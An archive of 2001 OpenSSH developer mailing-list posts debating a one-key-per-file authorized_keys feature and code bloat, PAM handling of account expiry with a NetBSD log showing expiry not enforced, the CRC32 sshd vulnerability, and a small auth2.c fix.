> > OpenSSH is security software. A lot of you keep asking for more and
> > more features, and the code keeps growing and growing and growing.
> > Assuming that the number of lines per bug is a constant, how long
> > before one of these features which no one uses becomes a hole?
> > 
> > I think it is ridiculous how some people keep demanding change.
> > 
> > Sorry, but I firmly believe that change for the sake of "I like it" is
> > stupid.
> 
> I agree. However, taking such a stand brings with it a risk of
> pseudo-forking. You say you won't take this patch because the feature is
> unnecessary bloat. The patch writer says okay, and just rolls it in
> himself on all his boxes. He also posts it on his website, and all the
> other people who liked the idea download it and roll it into their local
> installations.

I second this - it's likely to happen sooner than later. There are a number of things floating around that people *do* want to see, and one day, somebody will start "FlexSSH". I don't think this is a good thing.

Which doesn't mean every single thinkable feature should go into the OpenSSH code. But I don't think well-localized ones that touch only a very few places are such a bad thing.

gert

-- 
USENET is *not* the non-clickable part of WWW!
                                                           //www.muc.de/~gert/
Gert Doering - Munich, Germany                             gert at greenie.muc.de
fax: +49-89-35655025                        gert.doering at physik.tu-muenchen.de

From rob at hagopian.net Tue Jun 5 02:27:20 2001
From: rob at hagopian.net (Rob Hagopian)
Date: Mon, 4 Jun 2001 12:27:20 -0400 (EDT)
Subject: authorized_keys2 directory idea
In-Reply-To: 
Message-ID: 

On Mon, 4 Jun 2001 mouring at etoh.eviladmin.org wrote:

> Let's do a small reality check. OpenSSH has had complete v2 compatibility
> for how long now? 8 months? No.. 6 months? no.. 5 months? no.. Try
> about a month.
> 
> Let's do another reality check. How many people are still using v1?
> Still over 5x the user base of v2.
> 
> 
> THIS IS TOTALLY STUPID. v2 is the default for all transactions as of
> v2.9. Which means OpenSSH will only step down if (a) the user tells the
> software to, (b) the v2 keys don't exist, and (c) the remote side can
> not speak v2. IMNSHO this is the correct behavior for at least another
> year. Maybe by that time we can look at the v2 and v1 stats and consider
> disabling v1.
> 
> Migration paths are required evils. Thus is the reason Markus has taken
> a painful amount of time writing all that compatibility code for v1. And
> thus is the reason why ssh.com is a pain in the ass.

So now security decisions are made via user stats and not on the security merits? That's in direct contradiction to your reasoning for excluding this patch.

> > I won't claim that that's completely untrue, I notice a lot of emails from
> > people who want stuff from the portable code base to migrate back into
> > core. But I don't think it's fair, or even wise, to reject what three
> 
> What portable code? OpenSSH portable should implement no 'new' features
> outside what is required to get to compile and run.
> 
> We attempt to bring in 'universal' changes back to the OpenBSD tree when
> we feel it is right, but I see no reason why (Example) IRIX's overly
> complex authentication code needs to be put into the clean OpenBSD tree.

True, portable shouldn't add universal features, and that's another good reason not to put it in main portable diffs.
I understand Theo's arguments for not putting it in the main code base as well considering the extensive auditing that OpenBSD gets. I don't understand the objections to contrib, unless there's a desire to eventually cause a fork.

> I'll step up and state "No I do not feel that it's any easier to
> track a single file vs multiple little files. Therefore I do not wish
> to see such code added to the core tree."

OK, that's 3:2, with the only objections coming from the developers themselves. Way to listen to the users... isn't this exactly what happened with gcc?

> > And a number of files in contrib are actually required to build all the
> > packages for at least redhat. Since portable openssh distributes binaries
> > of these packages aren't those basically required to work?
> > 
> 
> You are trying to extend logic that is not correct. In all but a few cases
> in contrib/, the files are there to support the portable version
> directly. You directly need contrib/redhat/ or else you have
> authentication issues if you wish to use pam. This is nothing like "I
> want feature XYZ, but no one wants to commit it therefore I demand it be
> in contrib/."

So you can't use gnome-ask-pass under openbsd? And my assertion has been all along that there aren't enough patches (chroot.diff) in contrib that this should be a big deal anyways.

> > Finally, if you don't want it in the code dists, what about a webpage with
> > contrib patches? That would even give you an indication of popularity of
> > these patches. Shutting out contributed code like this can only hurt the
> > project in the long run...
> > -Rob
> 
> Requiring people like myself who help keep the OpenSSH portable tree alive
> to maintain all those code snippets will hurt the project even more.
> Because in the end it's the OpenBSD and OpenSSH Portable group stuck with
> dragging this contrib code forward to each new release.
> Not the original
> author who has long since left the mailing list and potentially their job
> and no longer cares about the patch they submitted.

Excuse me? I NEVER said you should maintain the code snippet, only that you should distribute it. Everything in every contrib is almost by definition AYOR...

> I look at contrib/ diff files as yet another thing a user will bitch about
> if it does not apply cleanly. A 'feature' they would have never even
> dreamed of had the *.diff file not existed. And one more headache to have
> to worry about during crunch time in the release process.

That certainly doesn't apply to this patch, ssh.com has this feature. In fact, by excluding it you also exclude the possibility that openssh could be a drop-in replacement for ssh.com (keeping existing keys) which would reduce headaches for people rolling the software out. (Note that I don't necessarily support that idea as I suspect the changes would be quite extensive.)

> Hell, at times I've almost removed contrib/chroot.diff because it was not
> kept up.

So why didn't you? If it doesn't have a hope of working in the current version why not remove it until someone fixes it? I never said you should keep known broken code in the tree.

> Anyways, I've had enough of this. =) I have real work that needs to be
> done.

So do it and let users deal with contrib patches... I already described a version system (like Apache's) that would make it clear to developers when they are working on/debugging contrib patched versions. There should be zero effort on your part to include this. Certainly less than it's taken to make a stand against extending the software.

-Rob

From Darren.Moffat at eng.sun.com Tue Jun 5 02:44:30 2001
From: Darren.Moffat at eng.sun.com (Darren Moffat)
Date: Mon, 4 Jun 2001 09:44:30 -0700 (PDT)
Subject: Handling of password & account expirations
Message-ID: <200106041646.f54Gk5Q613647@jurassic.eng.sun.com>

>While this no longer applies to OpenBSD now that we have moved to BSD_AUTH I
>believe this is still an issue with OpenSSH in the portable release, correct?
>We can't expect {Linux,Solaris,} to have BSD_AUTH can we?

It shouldn't be an issue on those systems since OpenSSH (unlike the SSH Communications Inc) properly calls pam_acct_mgmt() regardless of which type of authentication was used. On Linux and Solaris the password aging is enforced in a PAM module so the correct thing happens on these systems when the portable release is compiled with PAM support.

--
Darren J Moffat

From _nuub at yahoo.com Tue Jun 5 03:08:21 2001
From: _nuub at yahoo.com (nuuB)
Date: Mon, 4 Jun 2001 10:08:21 -0700 (PDT)
Subject: Recent breakins / SSHD root hole?
Message-ID: <20010604170821.56346.qmail@web11202.mail.yahoo.com>

>> 
>> Basically what I'd like to know is: What version of the OpenSSH daemon
>> would I need to run in order NOT to be vulnerable to this "weakness"?
>
>Sounds like
>ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00:30.openssh.asc

No, I don't think so. AFAIK that bug was fixed in 2.1.1, and apache.org reportedly ran "OpenSSH 2.2".

But doing a bit more digging I found
http://www.securityfocus.com/templates/advisory.html?id=3087
"Remote vulnerability in SSH daemon crc32 compensation attack detector"

This wasn't fixed until 2.3.0. This hole requires quite a lot of constants to be correct, and having local access makes this easier. This could explain why it wasn't exploited remotely on apache.org (though it could have been).

obOpenSSH: Anyhow, the fact that I had missed this hole completely has given me a new perspective. Normally I try to keep on top of all security holes in products I use. But for the past 6 months I haven't been reading bugtraq (the main source for such information). I find the SNR way too low these days. It's annoying to see an advisory on product X, then like 10 advisories on the same subject from a bunch of vendors (mostly Linux ones...) that ship product X. So I left bugtraq and instead relied on my vendor's (Redhat) ability to issue proper updates (yeah I know, stupid, but I thought it better than doing nothing).

It appears they haven't issued a bulletin for this problem (even though they ship OpenSSH 2.1.1 in RH 7.0). They did issue
http://www.redhat.com/support/errata/RHSA-2001-041.html
which fixes two other (much less serious) problems. It also happens to fix the above CRC attack, but it isn't mentioned in Redhat's bulletin (and I doubt they knew about it).
I don't upgrade things unless there is a problem that affects me (wise from previous updates where new problems of course snuck in with the upgrade). The two minor things mentioned didn't affect me, so I didn't upgrade. So here I am, 2 Jun, with a root hole that was announced on Feb 8. Almost 4 months with an open root hole. Gives me a real warm'n'fuzzy.... NOT. The only thing making me feel better is that the exploitation is quite far from ./hack with the public exploit.

Ah well. I guess it's back to bugtraq, and more time wasted weeding through the junk to find the good bits...

Sorry about the rant.

nuuB

__________________________________________________
Do You Yahoo!?
Get personalized email addresses from Yahoo! Mail - only $35 a year!
http://personal.mail.yahoo.com/

From markus.friedl at informatik.uni-erlangen.de Tue Jun 5 02:04:18 2001
From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl)
Date: Mon, 4 Jun 2001 18:04:18 +0200
Subject: authorized_keys2 directory idea
In-Reply-To: ; from jason@shalott.net on Mon, Jun 04, 2001 at 01:23:15AM -0700
References: <200106040329.f543T5n24299@cvs.openbsd.org>
Message-ID: <20010604180418.D22001@folly>

On Mon, Jun 04, 2001 at 01:23:15AM -0700, Jason Stone wrote:
> I agree. However, taking such a stand brings with it a risk of
> pseudo-forking.

no, forking is not a reason for accepting every patch.

right now openssh is already a little bit too fat, since i did accept too many patches in the past :)

so, perhaps, we should only add patches if they remove lines from openssh and make everything _simpler_.

remember, this is a security program:

	"complexity is the enemy"

-m

From markus.friedl at informatik.uni-erlangen.de Tue Jun 5 02:01:05 2001
From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl)
Date: Mon, 4 Jun 2001 18:01:05 +0200
Subject: authorized_keys2 directory idea
In-Reply-To: ; from rob@hagopian.net on Mon, Jun 04, 2001 at 12:12:52AM -0400
References: <200106040329.f543T5n24299@cvs.openbsd.org>
Message-ID: <20010604180105.C22001@folly>

On Mon, Jun 04, 2001 at 12:12:52AM -0400, Rob Hagopian wrote:
> OpenSSH changed from the ssh.com directory method... not that that's
> always a bad thing, I prefer not having a separate .ssh2 directory. But a
> lot of other unix utils have moved to file based rather than line based
> config methods for the simple reason that a lot of people working with
> these systems find it easier to manage them this way... Do you object to
> /proc, pam, and SysV rc scripts as well?

so how do i use
	sort
	uniq
	sed
if i use multiple files instead of a single file?

in a single file i can put the entries in a certain order.

there might be some uses for a-key-per-file, however, they do not justify a change in the way openssh is configured.

From markus.friedl at informatik.uni-erlangen.de Tue Jun 5 01:57:50 2001
From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl)
Date: Mon, 4 Jun 2001 17:57:50 +0200
Subject: authorized_keys2 directory idea
In-Reply-To: ; from pekkas@netcore.fi on Mon, Jun 04, 2001 at 12:52:50AM +0300
References: <20010603114604.B24416@folly>
Message-ID: <20010604175750.B22001@folly>

On Mon, Jun 04, 2001 at 12:52:50AM +0300, Pekka Savola wrote:
> Yes, keeping a file 100% in sync is way easier. But in real situations,
> you're often faced by the fact that e.g. 60-90% of the keys are the same,
> and the rest vary. Then syncing is a bit more difficult. Editing is also
> a bigger (ie: interactive) process when it has to be done on many hosts.
> 
> A problem is backup files if you edit keys with an editor, ie. ones ending
> to e.g. ~ or # (depending on the editor). Then if you just delete the
> base key, the results might be unexpected. To counter this, filenames
> would be scanned and only those that contain only legal characters would
> pass.

yes, you name one of the problems that appear with one-key-per-file.

it's also simpler to monitor a single file for changes.

it's easier to introduce races if you use multiple files.

but the main reason is: there won't be 2 different ways for doing the same thing and we won't drop the old scheme so we will not use a-key-per-file

> > > What do you think -- would this be useful? Bloat? Could it be considered
> > > to be merged if it was implemented?
> > 
> > i don't think it's useful. ssh.com switched to a-key-per-file,
> > but openssh and the traditional ssh use a-key-per-line
> 
> I wasn't aware ssh.com is doing something like this too. So it might be
> something to be done sooner or later, though.

no, i don't think that we should try to clone their implementation.

From pekkas at netcore.fi Tue Jun 5 05:37:15 2001
From: pekkas at netcore.fi (Pekka Savola)
Date: Mon, 4 Jun 2001 22:37:15 +0300 (EEST)
Subject: Recent breakins / SSHD root hole?
In-Reply-To: <20010604170821.56346.qmail@web11202.mail.yahoo.com>
Message-ID: 

On Mon, 4 Jun 2001, nuuB wrote:
[snip]
> which fixes two other (much less serious) problems. It also happens to fix the
> above CRC attack, but it isn't mentioned in Redhat's bulletin (and I doubt they
> knew about it). I don't upgrade things unless there is a problem that affects
> me (wise from previous updates where new problems of course snuck in with the
> upgrade). The two minor things mentioned didn't affect me, so I didn't upgrade.
> So here I am, 2 Jun, with a root hole that was announced on Feb 8. Almost 4
> months with an open root hole. Gives me a real warm'n'fuzzy.... NOT. The only
> thing making me feel better is that the exploitation is quite far from ./hack
> with the public exploit.

AFAIR, exploitation of the bug is in practice only possible with very good knowledge and access to the system etc. -- practically you would have to have an account in the box and still it wouldn't be child's play. Not something you can turn to "script-kiddie" type attack anyhow.

-- 
Pekka Savola                 "Tell me of difficulties surmounted,
Netcore Oy                   not those you stumble over and fall"
Systems. Networks. Security. -- Robert Jordan: A Crown of Swords

From wichert at valinux.com Tue Jun 5 05:46:11 2001
From: wichert at valinux.com (Wichert Akkerman)
Date: Mon, 4 Jun 2001 21:46:11 +0200
Subject: Recent breakins / SSHD root hole?
In-Reply-To: <20010604170821.56346.qmail@web11202.mail.yahoo.com>; from _nuub@yahoo.com on Mon, Jun 04, 2001 at 10:08:21AM -0700
References: <20010604170821.56346.qmail@web11202.mail.yahoo.com>
Message-ID: <20010604214610.N1971@cistron.nl>

Previously nuuB wrote:
> No, I don't think so. AFAIK that bug was fixed in 2.1.1, and apache.org
> reportedly ran "OpenSSH 2.2".

apache.org never had an insecure ssh, someone knew a password for an account and used that.

Wichert.

-- 
  _________________________________________________________________
 / Nothing is fool-proof to a sufficiently talented fool             \
| wichert at cistron.nl                   http://www.liacs.nl/~wichert/ |
| 1024D/2FA3BC2D 576E 100B 518D 2F16 36B0  2805 3CB8 9250 2FA3 BC2D    |

From markus.friedl at informatik.uni-erlangen.de Tue Jun 5 06:00:43 2001
From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl)
Date: Mon, 4 Jun 2001 22:00:43 +0200
Subject: authorized_keys2 directory idea
In-Reply-To: ; from rob@hagopian.net on Mon, Jun 04, 2001 at 10:41:44AM -0400
References: <20010604102059.B29589@folly>
Message-ID: <20010604220043.A325@folly>

On Mon, Jun 04, 2001 at 10:41:44AM -0400, Rob Hagopian wrote:
> Indeed, you never did touch the code base, but you still had to add a
> number of features/changes to the code to support v2.

the protocol is documented in an ietf draft.

> I'd still maintain that the ssh v2 ability to store keys as files
> came (long) before openssh v2 support.

of course. more software has been written before openssh v2.

> Why even cater to those people? Even the FreeBSD security notices
> specifically mention that ssh v1 has inherent security problems.

you mix talk about protocol and implementation.

> I don't
> even see why it's turned on by default for a distribution that
> superficially appears so security conscious.

so, what's the problem with protocol v1? even if it had inherent security problems, it's not inherent in the way the public keys are stored.

> Finally, if you don't want it in the code dists, what about a webpage with
> contrib patches? That would even give you an indication of popularity of
> these patches. Shutting out contributed code like this can only hurt the
> project in the long run...

i'm not shutting out contributed code.

From markus.friedl at informatik.uni-erlangen.de Tue Jun 5 06:09:31 2001
From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl)
Date: Mon, 4 Jun 2001 22:09:31 +0200
Subject: authorized_keys2 directory idea
In-Reply-To: ; from rob@hagopian.net on Mon, Jun 04, 2001 at 12:27:20PM -0400
References: 
Message-ID: <20010604220931.B325@folly>

On Mon, Jun 04, 2001 at 12:27:20PM -0400, Rob Hagopian wrote:
> So now security decisions are made via user stats and not on the
> security merits? That's in direct contradiction to your reasoning for
> excluding this patch.

what's wrong with protocol v1? does it matter to you?

From pekkas at netcore.fi Tue Jun 5 06:10:01 2001
From: pekkas at netcore.fi (Pekka Savola)
Date: Mon, 4 Jun 2001 23:10:01 +0300 (EEST)
Subject: authorized_keys2 directory idea
In-Reply-To: <20010604180418.D22001@folly>
Message-ID: 

On Mon, 4 Jun 2001, Markus Friedl wrote:
> 
> right now openssh is already a little bit too fat,
> since i did accept too many patches in the past :)
> 
> so, perhaps, we should only add patches if they remove lines from
> openssh and make everything _simpler_.
> 
> remember, this is a security program:
> 
> 	"complexity is the enemy"

Too much simplicity will also hinder usability, unfortunately. Some like programs simpler than others; many think OpenBSD takes the KISS paradigm sometimes too far -- others like it that way. The extent of features optimally included depends on the application. I consider ssh one of those that needs more than the average. Just my humble IMO of course.

It would be nice if it was possible to get the main ssh/sshd thinner, and put more functionality in completely non-privileged "modules". That way security-critical code hopefully could be minimized and cleaned, while keeping the usability and most features in.

-- 
Pekka Savola                 "Tell me of difficulties surmounted,
Netcore Oy                   not those you stumble over and fall"
Systems. Networks. Security. -- Robert Jordan: A Crown of Swords

From rob at hagopian.net Tue Jun 5 06:11:54 2001
From: rob at hagopian.net (Rob Hagopian)
Date: Mon, 4 Jun 2001 16:11:54 -0400 (EDT)
Subject: authorized_keys2 directory idea
In-Reply-To: <20010604180105.C22001@folly>
Message-ID:

I'm surprised you're advocating the use of sed on authorized_keys files!

It's pretty sick, but: cat keys/* | sort | uniq | sed | split -l 1
But of course you lose filenames... you might be able to pull them out of
the comment field... but the point isn't to make it more difficult...

How do you see the time a key was added to your single file? Can you track
individual key changes through utils like tripwire? How about making some
keys immutable but allowing others to be updated? Can I make a symlink to
a common public key that root updates?

I'm not saying that there aren't advantages to a single file, although I'd
be a lot less likely to use sort/uniq/sed than I would be to make a key
immutable, but there are some advantages to separate files too.

As I think about it, I think that taking both and merging them gives even
more flexibility. If you allow multiple files, each with one *or more*
keys in it, you don't change the existing key lookup code except to
include more files in the searching (authorized_keys2 and
authorized_dir2/* or such).

A cursory look at the code looks to add about 10 lines of code to add that
functionality.
                                                                -Rob

On Mon, 4 Jun 2001, Markus Friedl wrote:
> On Mon, Jun 04, 2001 at 12:12:52AM -0400, Rob Hagopian wrote:
> > OpenSSH changed from the ssh.com directory method... not that that's
> > always a bad thing, I prefer not having a separate .ssh2 directory. But a
> > lot of other unix utils have moved to file based rather than line based
> > config methods for the simple reason that a lot of people working with
> > these systems find it easier to manage them this way... Do you object to
> > /proc, pam, and SysV rc scripts as well?
>
> so how do i use
>         sort
>         uniq
>         sed
> if i use multiple files instead of a single file?
>
> in a single file i can put the entries in a certain order.
>
> there might be some uses for a-key-per-file, however,
> they do not justify a change in the way openssh
> is configured.
>

From markus.friedl at informatik.uni-erlangen.de Tue Jun 5 06:12:52 2001
From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl)
Date: Mon, 4 Jun 2001 22:12:52 +0200
Subject: authorized_keys2 directory idea
In-Reply-To: <20010604175032.A26171@greenie.muc.de>; from gert@greenie.muc.de on Mon, Jun 04, 2001 at 05:50:32PM +0200
References: <200106040329.f543T5n24299@cvs.openbsd.org> <20010604175032.A26171@greenie.muc.de>
Message-ID: <20010604221252.C325@folly>

On Mon, Jun 04, 2001 at 05:50:32PM +0200, Gert Doering wrote:
> I second this - it's likely to happen sooner than later. There are a
> number of things floating around that people *do* want to see, and one
> day, somebody will start "FlexSSH". I don't think this is a good thing.
>
> Which doesn't mean every single thinkable feature should go into the
> OpenSSH code. But I don't think well-localized ones that touch only
> a very few places are such a bad thing.

openssh is already too big, more than 40K lines, so i see no reason
for integrating every possible feature.

From markus.friedl at informatik.uni-erlangen.de Tue Jun 5 06:18:55 2001
From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl)
Date: Mon, 4 Jun 2001 22:18:55 +0200
Subject: authorized_keys2 directory idea
In-Reply-To: ; from pekkas@netcore.fi on Mon, Jun 04, 2001 at 11:10:01PM +0300
References: <20010604180418.D22001@folly>
Message-ID: <20010604221855.A23839@folly>

On Mon, Jun 04, 2001 at 11:10:01PM +0300, Pekka Savola wrote:
> On Mon, 4 Jun 2001, Markus Friedl wrote:
> >
> > right now openssh is already a little bit too fat,
> > since i did accept too many patches in the past :)
> >
> > so, perhaps, we should only add patches if they remove lines from
> > openssh and make everything _simpler_.
> >
> > remember, this is a security program:
> >
> > "complexity is the enemy"
>
> Too much simplicity will also hinder usability, unfortunately. Some like

maybe, but there is no 'simplicity' in OpenSSH, it's fat and keeps
getting fatter.

> programs simpler than others; many think OpenBSD takes KISS paradigm
> sometimes too far -- others like it that way.

"OpenBSD takes KISS paradigm sometimes too far"?

i really don't think that, OpenBSD is far away from plan9's simplicity.

From markus.friedl at informatik.uni-erlangen.de Tue Jun 5 06:21:33 2001
From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl)
Date: Mon, 4 Jun 2001 22:21:33 +0200
Subject: authorized_keys2 directory idea
In-Reply-To: ; from rob@hagopian.net on Mon, Jun 04, 2001 at 04:11:54PM -0400
References: <20010604180105.C22001@folly>
Message-ID: <20010604222133.B23839@folly>

On Mon, Jun 04, 2001 at 04:11:54PM -0400, Rob Hagopian wrote:
> How do you see the time a key was added to your single file?

rcs

> Can you track
> individual key changes through utils like tripwire? How about making some
> keys immutable but allowing others to be updated?

this is not ssh's business. all entries should be immutable
to anybody but the user. the user should be able to edit all.

From rob at hagopian.net Tue Jun 5 06:25:49 2001
From: rob at hagopian.net (Rob Hagopian)
Date: Mon, 4 Jun 2001 16:25:49 -0400 (EDT)
Subject: authorized_keys2 directory idea
In-Reply-To: <20010604220931.B325@folly>
Message-ID:

From FreeBSD-SA-01:24.ssh.asc:

"If you are running sshd, disable the use of the SSH1 protocol in
OpenSSH. SSH1 contains inherent protocol deficiencies and is not
recommended for use in high-security environments. Note that some
third-party SSH clients are not capable of using the SSH2 protocol,
however the OpenSSH client (version 2.1 and later) included in FreeBSD
is SSH2-capable."

No, it doesn't matter to me, although all of our higher security boxes
have ssh1 turned off.

It does worry me that openssh still has a significant amount of ssh.com
v1.2.xx code in it. I'm sure it's been audited a number of times, but
problems have still cropped up in it recently...
                                                                -Rob

On Mon, 4 Jun 2001, Markus Friedl wrote:
> On Mon, Jun 04, 2001 at 12:27:20PM -0400, Rob Hagopian wrote:
> > So now security decisions are made via stats user stats and not on the
> > security merits? That's in direct contradiction to your reasoning for
> > excluding this patch.
>
> what's wrong with protocol v1? does it matter to you?
>

From pekkas at netcore.fi Tue Jun 5 06:28:09 2001
From: pekkas at netcore.fi (Pekka Savola)
Date: Mon, 4 Jun 2001 23:28:09 +0300 (EEST)
Subject: authorized_keys2 directory idea
In-Reply-To: <20010604221855.A23839@folly>
Message-ID:

On Mon, 4 Jun 2001, Markus Friedl wrote:
> > programs simpler than others; many think OpenBSD takes KISS paradigm
> > sometimes too far -- others like it that way.
>
> "OpenBSD takes KISS paradigm sometimes too far"?
>
> i really don't think that, OpenBSD is far away from plan9's simplicity.

See what it has amounted to: plan9 is not being used at all (at all so
that it counts anyway) and OpenBSD is mainly used by people who want
their code clean, or are rather security-conscious (basically).

So I don't think striving to make everything much simpler than it
currently is, is going to really work in general.

--
Pekka Savola                 "Tell me of difficulties surmounted,
Netcore Oy                    not those you stumble over and fall"
Systems. Networks. Security. -- Robert Jordan: A Crown of Swords

From raj at cerias.purdue.edu Tue Jun 5 06:37:41 2001
From: raj at cerias.purdue.edu (Brian Poole)
Date: Mon, 4 Jun 2001 15:37:41 -0500
Subject: Handling of password & account expirations
In-Reply-To: <200106041646.f54Gk5Q613647@jurassic.eng.sun.com>; from Darren.Moffat@eng.sun.com on Mon, Jun 04, 2001 at 09:44:30AM -0700
References: <200106041646.f54Gk5Q613647@jurassic.eng.sun.com>
Message-ID: <20010604153741.B4977@basm.cerias.purdue.edu>

Quoting Darren Moffat (Darren.Moffat at eng.sun.com) from 4 June 2001:
> >While this no longer applies to OpenBSD now that we have moved to BSD_AUTH I
> >believe this is still an issue with OpenSSH in the portable release, correct?
> >We can't expect {Linux,Solaris,} to have BSD_AUTH can we?
>
> It shouldn't be an issue on those systems since OpenSSH (unlike the
> SSH Communications Inc) properly calls pam_acct_mgmt() regardless of
> which type of authentication was used. On Linux and Solaris the
> password aging is enforced in a PAM module so the correct thing happens on
> these systems when the portable release is compiled with PAM support.

Okay, on Linux and Solaris it appears to be fine. FreeBSD looked good from
a quick test as well but we can't assume that just because some of the OSes
are okay that they all are. For example, on NetBSD this still works (just
like it did on OpenBSD until last week). A log snippet is included at the
end showing this on a recent snapshot. I assume there are other OSes like
this. Just because the OS does not have PAM installed does not mean that
we should let this door hang open, does it?

-b

fubared# ssh -V
OpenSSH_2.9 NetBSD_Secure_Shell-20010515, SSH protocols 1.5/2.0, OpenSSL 0x0090601f
fubared# userdel -r test
fubared# useradd -m test
fubared# usermod -f 1 -e"`date +%c`" test
fubared# userinfo test
login   test
passwd  *************
uid     1000
groups  users
change  Wed Dec 31 19:00:01 1969
class
gecos
dir     /home/test
shell   /bin/csh
expire  Mon Jun 4 10:29:53 2001
fubared# passwd test
Changing local password for test.
New password:
Retype new password:
fubared# ssh -l test localhost
test at localhost's password:
Last login: Mon Jun 4 10:24:42 2001 from localhost
NetBSD 1.5V (GENERIC) #47: Sat May 26 12:20:02 PDT 2001

Welcome to NetBSD!

Spelling is a lossed art.
fubared: {1}

/* Welp, that's bad.. Respects neither password nor account expiration */
/* Let's verify that they are in fact expired */

fubared# telnet localhost
Trying ::1...
telnet: connect to address ::1: Connection refused
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.

login: test
Password:
Sorry -- your account has expired.

From rob at hagopian.net Tue Jun 5 07:13:44 2001
From: rob at hagopian.net (Rob Hagopian)
Date: Mon, 4 Jun 2001 17:13:44 -0400 (EDT)
Subject: authorized_keys2 directory idea
In-Reply-To: <20010604222133.B23839@folly>
Message-ID:

On Mon, 4 Jun 2001, Markus Friedl wrote:
> On Mon, Jun 04, 2001 at 04:11:54PM -0400, Rob Hagopian wrote:
> > How do you see the time a key was added to your single file?
>
> rcs

Fine, but with cvs I could check out individual key files, I can't do that
with cvs and a single file.

> > Can you track
> > individual key changes through utils like tripwire? How about making some
> > keys immutable but allowing others to be updated?
>
> this is not ssh's business. all entries should be immutable
> to anybody but the user. the user should be able to edit all.

Really... that's awfully heavy-handed to lay down security policy like
that... In fact, I have a number of keys that I don't want the user to be
able to modify at all as we've had problems with that in the past. Not to
mention that immutable with a higher security level can not be changed at
all without a reboot. And you didn't address symlinks... (and if they are
set up correctly by the user I don't believe there are security issues)

The general point is that every OS I can think of has additional
capabilities that can be applied to individual files that can not be
applied to multiple lines within a file. Counter, as you noted, is that
programs to do bulk modifications (sort and uniq [most of sed's stuff can
be done in a loop on all keys]) don't work as well with multiple files.

I still don't see why we can't have both, esp in contrib. Life is not
simple, there is never one best solution for everyone. Where possible and
reasonable I don't see why openssh can't be made more flexible. I strongly
feel that this (what I envision as a 20 line patch with low security
implications) is one of those times.
                                                                -Rob

From deraadt at cvs.openbsd.org Tue Jun 5 07:40:09 2001
From: deraadt at cvs.openbsd.org (Theo de Raadt)
Date: Mon, 04 Jun 2001 15:40:09 -0600
Subject: authorized_keys2 directory idea
In-Reply-To: Your message of "Mon, 04 Jun 2001 16:11:54 EDT."
Message-ID: <200106042140.f54Le9V30365@cvs.openbsd.org>

This is getting very tiring.

Can you please start your own ssh derivative project?

> I'm surprised you're advocating the use of sed on authorized_keys files!
>
> It's pretty sick, but: cat keys/* | sort | uniq | sed | split -l 1
> But of course you lose filenames... you might be able to pull them out of
> the comment field... but the point isn't to make it more difficult...
>
> How do you see the time a key was added to your single file? Can you track
> individual key changes through utils like tripwire? How about making some
> keys immutable but allowing others to be updated? Can I make a symlink to
> a common public key that root updates?
>
> I'm not saying that there aren't advantages to a single file, although I'd
> be a lot less likely to use sort/uniq/sed than I would be to make a key
> immutable, but there are some advantages to separate files too.
>
> As I think about it, I think that taking both and merging them gives even
> more flexibility. If you allow multiple files, each with one *or more*
> keys in it, you don't change the existing key lookup code except to
> include more files in the searching (authorized_keys2 and
> authorized_dir2/* or such).
>
> A cursory look at the code looks to add about 10 lines of code to add that
> functionality.
>                                                                 -Rob
>
> On Mon, 4 Jun 2001, Markus Friedl wrote:
>
> > On Mon, Jun 04, 2001 at 12:12:52AM -0400, Rob Hagopian wrote:
> > > OpenSSH changed from the ssh.com directory method... not that that's
> > > always a bad thing, I prefer not having a separate .ssh2 directory. But a
> > > lot of other unix utils have moved to file based rather than line based
> > > config methods for the simple reason that a lot of people working with
> > > these systems find it easier to manage them this way... Do you object to
> > > /proc, pam, and SysV rc scripts as well?
> >
> > so how do i use
> >         sort
> >         uniq
> >         sed
> > if i use multiple files instead of a single file?
> >
> > in a single file i can put the entries in a certain order.
> >
> > there might be some uses for a-key-per-file, however,
> > they do not justify a change in the way openssh
> > is configured.
> >
>

From deraadt at cvs.openbsd.org Tue Jun 5 07:40:58 2001
From: deraadt at cvs.openbsd.org (Theo de Raadt)
Date: Mon, 04 Jun 2001 15:40:58 -0600
Subject: authorized_keys2 directory idea
In-Reply-To: Your message of "Mon, 04 Jun 2001 23:10:01 +0300."
Message-ID: <200106042140.f54LewV25801@cvs.openbsd.org>

> Too much simplicity will also hinder usability, unfortunately. Some like
> programs simpler than others; many think OpenBSD takes KISS paradigm
> sometimes too far -- others like it that way. The extent of features
> optimally included depends on the application. I consider ssh one of
> those that needs more than the average. Just my humble IMO of course.
>
> It would be nice if it was possible to get the main ssh/sshd thinner, and
> put more functionality in completely non-privileged "modules". That way
> security-critical code hopefully could be minimized and cleaned, while
> keeping the usability and most features in.

If any of you put in 1% of the work Markus has put in, we would listen to
you.

Am I being harsh?

Yes. Am I being realistic? Yes.

From deraadt at cvs.openbsd.org Tue Jun 5 07:43:14 2001
From: deraadt at cvs.openbsd.org (Theo de Raadt) Date: Mon, 04 Jun 2001 15:43:14 -0600 Subject: authorized_keys2 directory idea In-Reply-To: Your message of "Mon, 04 Jun 2001 16:25:49 EDT." Message-ID: <200106042143.f54LhEV08885@cvs.openbsd.org> > It does worry me that openssh still has a significant amount of ssh.com > v1.2.xx code in it. I'm sure it's been audited a number of times, but > problems have still cropped up in it recently... We look forward to your patches. In the meantime, we are very tired of your lengthy chit-chats, so send in fixes, or SHUT UP. I can't believe how patient we are with people who yammer on and on and on. From wichert at cistron.nl Tue Jun 5 07:45:54 2001 From: wichert at cistron.nl (Wichert Akkerman) Date: Mon, 4 Jun 2001 23:45:54 +0200 Subject: password_authtentication option ignored in auth handling Message-ID: <20010604234554.A26589@cistron.nl> There is one spot where the password_authentication option was ignored, patch follows. Wichert. diff -wur org/openssh-2.5.2p2/auth2.c openssh-2.5.2p2/auth2.c --- org/openssh-2.5.2p2/auth2.c Sun Mar 11 21:01:56 2001 +++ openssh-2.5.2p2/auth2.c Mon Jun 4 23:31:54 2001 @@ -397,7 +397,7 @@ authenticated = auth2_challenge(authctxt, devs); #ifdef USE_PAM - if (authenticated == 0) + if (options.password_authentication && authenticated == 0) authenticated = auth2_pam(authctxt); #endif xfree(lang); -- _________________________________________________________________ / 